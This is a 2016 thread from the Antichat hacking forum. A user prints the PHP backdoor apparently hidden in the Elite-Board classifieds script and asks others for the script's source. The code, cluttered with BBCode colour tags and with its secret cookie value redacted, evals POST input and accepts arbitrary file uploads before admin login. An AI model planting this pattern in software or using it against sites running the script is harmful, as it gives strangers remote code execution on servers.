Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Elite-Board - встренный бэкдор (безнадёжная ситуация) (https://forum.antichat.xyz/showthread.php?t=443063)

Disasm 12.10.2016 03:48
Друзья, всех приветствую! Стараюсь по пустякам не обращаться за помощью, но ситуация складывается абсолютно безнадёжная.

Существует старый, как говно мамонта, скрипт доски объявлений - "Elite-Board", разработчик: http://illusionweb.org/

В данный скрипт разработчик внедрил бэкдор, подробнее: http://searchengines.guru/showthread.php?t=770644

Код бэкдора:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'megasecret'[/COLOR][COLOR="#007700"]]))
{
 if([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'megasecret'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'удалено на всякий случай'[/COLOR][COLOR="#007700"])
 {
 echo[/COLOR][COLOR="#DD0000"]'








stripslashes



'[/COLOR][COLOR="#007700"];
 if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
 {
 if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-str'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
 {
[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]]);
 }
 eval([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]]);
 }
 echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
 if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]]))
 {
[/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-path'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);
 }
 exit();
 }
}[/COLOR][/COLOR
Бэкдор покоится в файле includes/optimizer/admin/funct.php, инклудится при входе в админку (до авторизации, т.е. авторизация не требуется). Бэкдор по стандарту завёрнут в eval(base64_decode()). Сам файл (funct.php) зашифрован зендом.

Бэкдор присутствует в версиях Elite-Board 2.0

Disasm 23.10.2016 19:56
Тут все трупы что ли? Неужели ни у кого нет соображений, как же всё-таки раздобыть сурс этой доски? Пошуршите на винтах, может у кого валяется.

Дурдом. Есть бэкдор, но в этих ваших интернетах, где никогда ничего не пропадает, невозможно найти исходник скрипта.

Disasm 23.10.2016 19:59
Загуглился уже до того, что даже откопал часть исходника, который кто-то когда-то прогонял через онлайн-сервис декодирования base64: http://www.unphp.net/decode/304e6ee0...e206bb10a71ad/


Время: 14:31